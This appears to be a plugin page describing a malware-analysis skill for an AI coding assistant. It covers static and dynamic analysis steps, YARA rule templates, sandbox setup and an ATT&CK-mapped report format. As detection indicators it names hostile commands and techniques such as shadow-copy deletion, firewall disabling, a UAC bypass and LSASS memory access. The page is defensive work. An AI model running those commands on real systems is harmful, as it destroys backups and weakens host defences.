Stats
Actions
Tags
'%20stop-opacity%3D'0.16'%2F%3E%3Cstop%20offset%3D'1'%20stop-color%3D'rgb(200%2C90%2C60)'%20stop-opacity%3D'0.03'%2F%3E%3C%2FlinearGradient%3E%3C%2Fdefs%3E%3Crect%20width%3D'320'%20height%3D'200'%20fill%3D'url(%23g)'%2F%3E%3Ccircle%20cx%3D'250'%20cy%3D'56'%20r%3D'92'%20fill%3D'rgb(200%2C90%2C60)'%20fill-opacity%3D'0.06'%2F%3E%3Ccircle%20cx%3D'64'%20cy%3D'172'%20r%3D'58'%20fill%3D'rgb(200%2C90%2C60)'%20fill-opacity%3D'0.05'%2F%3E%3C%2Fsvg%3E)
From cybersecurity
Provides static and dynamic malware analysis, YARA rule generation, sandbox configuration, behavioral profiling, and malware family classification for cybersecurity investigations.
How this skill is triggered — by the user, by Claude, or both
Slash command
/cybersecurity:05-malware-analysisThe summary Claude sees in its skill listing — used to decide when to auto-load this skill
Enable Claude to assist with malware analysis workflows including static analysis of file properties and code, dynamic behavioral analysis interpretation, YARA rule generation, sandbox configuration, and malware family identification. Claude analyzes provided artifacts directly and orchestrates scripts for automated processing.
Enable Claude to assist with malware analysis workflows including static analysis of file properties and code, dynamic behavioral analysis interpretation, YARA rule generation, sandbox configuration, and malware family identification. Claude analyzes provided artifacts directly and orchestrates scripts for automated processing.
Safety Warning: Never execute suspicious files outside of isolated, controlled environments. Use dedicated VMs or sandboxes with network isolation and snapshot capability.
This skill activates when the user asks about:
pip install yara-python pefile python-magic requests ssdeep
Recommended analysis tools:
Cuckoo Sandbox / CAPE — Automated dynamic analysisVirusTotal API — Multi-engine scanning and intelYARA — Pattern matching engineGhidra / IDA Pro — Deep binary analysis (→ Skill 04)Volatility 3 — Memory forensicsDIE (Detect-It-Easy) — Packer/compiler detectionPestudio — Windows PE static analysisWhen the user provides a suspicious file or hash for analysis:
Claude performs analysis in this order:
Step 1 — File Identification:
file malware.exe # File type from magic bytes
md5sum malware.exe # MD5 hash (legacy, for lookups)
sha256sum malware.exe # SHA-256 (primary identifier)
python scripts/static_analyzer.py --file malware.exe --hashes
Step 2 — Threat Intelligence Lookup:
# VirusTotal hash lookup via API
curl "https://www.virustotal.com/api/v3/files/<sha256>" -H "x-apikey: YOUR_KEY"
Step 3 — PE Analysis (Windows executables):
python scripts/static_analyzer.py --file malware.exe --strings --imports --output report.json
Look for these indicators in the output:
Suspicious Import Functions:
| Category | Suspicious APIs |
|---|---|
| Process Injection | CreateRemoteThread, WriteProcessMemory, VirtualAllocEx, NtMapViewOfSection, RtlCreateUserThread |
| Persistence | RegSetValueEx, CreateService, SHFileOperation, ITaskScheduler |
| Anti-Analysis | IsDebuggerPresent, CheckRemoteDebuggerPresent, GetTickCount, QueryPerformanceCounter, GetSystemInfo |
| Network C2 | InternetOpenUrl, HttpSendRequest, WSAStartup, socket, URLDownloadToFile, WinHttpOpen |
| Crypto Operations | CryptEncrypt, CryptDecrypt, BCryptEncrypt, CryptHashData |
| Credential Access | SamOpenDatabase, LsaOpenPolicy, NtlmGetUserInfo |
| Keylogging | SetWindowsHookEx, GetAsyncKeyState, GetKeyboardState |
| Defense Evasion | VirtualProtect, NtSetInformationProcess, Wow64DisableWow64FsRedirection |
Step 4 — String Extraction & Analysis:
strings -a malware.exe | grep -E "(http|ftp|/[a-z]|[0-9]{1,3}\.[0-9]{1,3}|HKEY|reg|cmd|powershell)"
Categorize extracted strings:
Step 5 — Entropy Analysis:
python scripts/static_analyzer.py --file malware.exe --entropy
| Entropy Range | Interpretation |
|---|---|
| 0.0 – 1.0 | Near-empty or all-zeros section |
| 1.0 – 5.0 | Normal code/data section |
| 5.0 – 7.0 | Compressed data or code |
| 7.0 – 8.0 | Encrypted or packed data — investigate |
| 7.9 – 8.0 | Highly suspicious — likely encrypted payload |
When the user asks to create YARA rules from a sample or indicators:
Claude generates YARA rules following this methodology:
YARA Rule Templates:
// Tier 1: Specific sample (hash-based)
rule MalwareFamily_Variant_Hash {
meta:
author = "Analyst Name"
date = "2025-05-28"
description = "Detects [MalwareFamily] [Variant] — specific sample"
sha256 = "aabbcc..."
tlp = "GREEN"
reference = "https://example.com/analysis"
condition:
hash.sha256(0, filesize) == "aabbcc..."
}
// Tier 2: Family-level detection (behavioral strings)
rule MalwareFamily_Generic {
meta:
author = "Analyst Name"
date = "2025-05-28"
description = "Detects [MalwareFamily] family by strings and structure"
tlp = "GREEN"
strings:
// C2 patterns
$c2_ua = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" ascii
$c2_uri = "/gate.php?id=" ascii
// Crypto constants
$rc4_key = { 52 43 34 5F 4B 45 59 } // "RC4_KEY" hex
// Mutex
$mutex = "Global\\MSDTC_MUTEX_" ascii wide
// Registry persistence key
$reg_key = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" ascii wide nocase
// Anti-analysis check
$vm_check = "VBOX" ascii wide nocase
condition:
uint16(0) == 0x5A4D and // MZ header (PE file)
filesize < 2MB and
(
(2 of ($c2_*)) or
($mutex and 1 of ($reg_key, $rc4_key))
)
and not $vm_check // Exclude sandbox-aware variants
}
// Tier 3: Network IOC detection (for NIDS integration)
rule MalwareFamily_Network_C2 {
meta:
description = "Detects [MalwareFamily] C2 communication patterns"
type = "network"
strings:
$beacon_path = "/api/v1/ping?uid=" ascii
$beacon_ua = "MalBot/1.0" ascii
$checkin_hdr = "X-Command-Key: " ascii
condition:
any of them
}
# Generate YARA rules using the script
python scripts/yara_generator.py --samples ./malware_samples/ --output rules.yar
python scripts/yara_generator.py --file single_sample.exe --rule-name "MalwareFamily" --output rule.yar
# Test rules against benign files
yara -r generated_rule.yar /usr/bin/ 2>/dev/null | wc -l # Should be 0
yara generated_rule.yar malware.exe # Should match
When the user provides sandbox analysis output or asks about dynamic analysis:
Interpreting Cuckoo/CAPE Sandbox Reports:
Claude analyzes behavioral reports looking for:
Process Tree Analysis:
Network Indicators:
File System Changes:
vssadmin delete shadows → ransomware indicator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Registry Modifications:
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunHKLM\SYSTEM\CurrentControlSet\Services\MITRE ATT&CK Mapping:
| Observed Behavior | MITRE Technique |
|---|---|
| PowerShell download cradle | T1059.001 — PowerShell |
cmd /c vssadmin delete shadows | T1490 — Inhibit System Recovery |
| Registry Run key persistence | T1547.001 — Registry Run Keys |
| CreateRemoteThread injection | T1055.001 — DLL Injection |
| Scheduled task creation | T1053.005 — Scheduled Task |
netsh advfirewall set allprofiles state off | T1562.004 — Disable Host Firewall |
| UAC bypass (fodhelper.exe) | T1548.002 — Bypass UAC |
| LSASS memory access | T1003.001 — LSASS Memory |
When the user asks to identify or classify a malware sample:
Classification by behavioral patterns:
| Family Indicators | Likely Family Category |
|---|---|
| Shadow copies deleted + file encryption + ransom note | Ransomware |
| Regular HTTP beaconing + command execution + lateral movement | RAT/Botnet |
| Browser credential theft + banking overlay | Banking Trojan |
| Keylogging + screenshot capture + data exfiltration | Spyware/Infostealer |
| Process hollowing + covert persistence | Rootkit/Backdoor |
| Cryptocurrency mining process spawning | Cryptominer |
| Worm propagation via network shares | Worm |
| Document with macro downloading payload | Dropper/Downloader |
Similarity analysis:
# SSDeep fuzzy hash comparison
ssdeep -l malware.exe > hash.txt
ssdeep -m hash.txt similar_sample.exe
# Similarity > 70% → likely same family/variant
When the user asks to set up a malware analysis environment:
Minimum isolation requirements:
Recommended sandbox stack:
Analysis VM (Windows 10/11 or Ubuntu):
├── FakeNet-NG or INetSim — Simulate network services
├── Wireshark — Capture network traffic
├── ProcessMonitor (Windows) / strace (Linux) — Monitor syscalls
├── Regshot (Windows) — Compare registry before/after
├── Autoruns (Windows) — Monitor persistence locations
└── Cuckoo/CAPE Agent — Automated collection
Network Layer:
└── Host-only adapter → no real internet → INetSim captures C2 attempts
Anti-anti-VM measures:
For every analyzed sample, produce:
## Malware Analysis Report — [Sample Name]
**Hashes:**
- MD5: [hash]
- SHA1: [hash]
- SHA256: [hash]
- SSDeep: [fuzzy hash]
**Classification:** [Ransomware / RAT / Infostealer / etc.]
**Confidence:** [High / Medium / Low]
**Family:** [Family Name, if identified]
**First Seen:** [Date from TI sources]
**Network IOCs:**
- IPs: [list]
- Domains: [list]
- URLs: [list]
- User-Agent: [string]
**Host IOCs:**
- File Paths: [list]
- Registry Keys: [list]
- Mutex Names: [list]
- Services: [list]
**MITRE ATT&CK Mapping:**
- [Tactic]: [Technique ID] — [Technique Name]
**YARA Rules:** [Attached]
**Sigma Rules:** [Attached, for Skill 12]
static_analyzer.pypython scripts/static_analyzer.py --file malware.exe --output report.json
python scripts/static_analyzer.py --file sample.dll --hashes --strings --imports --entropy
yara_generator.pypython scripts/yara_generator.py --samples ./malware_samples/ --output rules.yar
python scripts/yara_generator.py --file single_sample.exe --rule-name "MyMalware" --output rule.yar
| Condition | Adjacent Skill |
|---|---|
| Needs deeper disassembly | → Skill 04 (Reverse Engineering) |
| IOCs ready for environment-wide hunting | → Skill 06 (Threat Hunting) |
| Malware collected during IR | ← Skill 07 (Incident Response) |
| Create detection signatures | → Skill 15 (Blue Team Defense) |
Aligned to the current threat landscape:
rundll32, mshta, regsvr32, msbuild) and PowerShell/.NET reflective loads.Safety rule: detonate only in an isolated, snapshot-restored VM with no production network reachability; document the sandbox config in the report.
npx claudepluginhub masriyan/claude-code-cybersecurity-skill --plugin cybersecurityPerforms rapid malware triage and classification using YARA rules. Covers rule writing, scanning, and integration with analysis pipelines. Useful for developers handling malware samples or building detection systems.
Performs malware triage and classification using YARA rules to match file patterns, strings, and bytes against known families. Guides scanning, rule writing, and pipeline integration for sample analysis.
Performs rapid malware triage and classification using YARA rules to match file patterns, strings, byte sequences, and structural characteristics against known malware families and suspicious indicators.